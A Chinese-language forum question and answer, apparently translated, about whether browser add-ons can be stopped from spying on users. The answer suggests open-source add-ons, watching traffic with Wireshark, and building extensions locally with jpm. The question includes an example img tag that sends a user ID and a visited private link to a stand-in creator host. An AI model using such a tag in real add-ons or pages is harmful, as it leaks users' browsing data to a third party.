原则上,任何浏览器插件都可以通过收集浏览器历史记录、网络邮件或其他敏感数据来监视我。据我所知,它可以使用XMLHttpRequest()或fetch()通过操纵 DOM 将这些数据发送回其创建者,例如添加类似
<img src="http://addon-creators-page.com/?userid=uniqueId#https://sensitive-page.com/secret-link-i-visited"/>
触发对插件创建者页面的 HTTP 请求,并可以发送他想要的任何数据。但是,并非所有插件都需要发出 HTTP 请求或操作 DOM。
因此问题是:
对于某些浏览器,是否存在一些现有的解决方案来限制附加组件可访问的 JavaScript 功能 - 特别是 DOM 操作和 HTTP 请求?
答案1
我不确定,但这取决于你的浏览器。你只能使用开源插件,这样你就可以检查它们是否回拨。此外,你可以使用类似 Wireshark 的东西来查找浏览器进程发送到你正在访问的网站以外的 IP 的任何请求。此外,如果你使用的是 Firefox,除非你禁用遥测,否则会有很多回拨到 Mozilla,我相信 about:config 中还有另一个选项。我忘了另一个选项,但你可以找到它这里。我不确定如何阻止插件回拨,我想您可以尝试自定义构建 Firefox 并以某种方式修改插件的运行方式,以阻止它们发送 Web 请求。但这会使大多数插件变得无用,因为它们通常必须发送 Web 请求才能工作。
为了验证开源插件没有被篡改,您可以自行编译它。本教程向您展示如何安装可以编译 Firefox 扩展的 jpm。安装 jpm 后,运行:
jpm xpi
在插件源目录中生成 xpi 扩展文件。然后打开 xpi 并安装它。它可能会告诉您它是不受信任的,那是因为它是编译的,没有签名,或者在 Mozilla 附加网站上。这应该适用于大多数扩展,除非它们非常旧。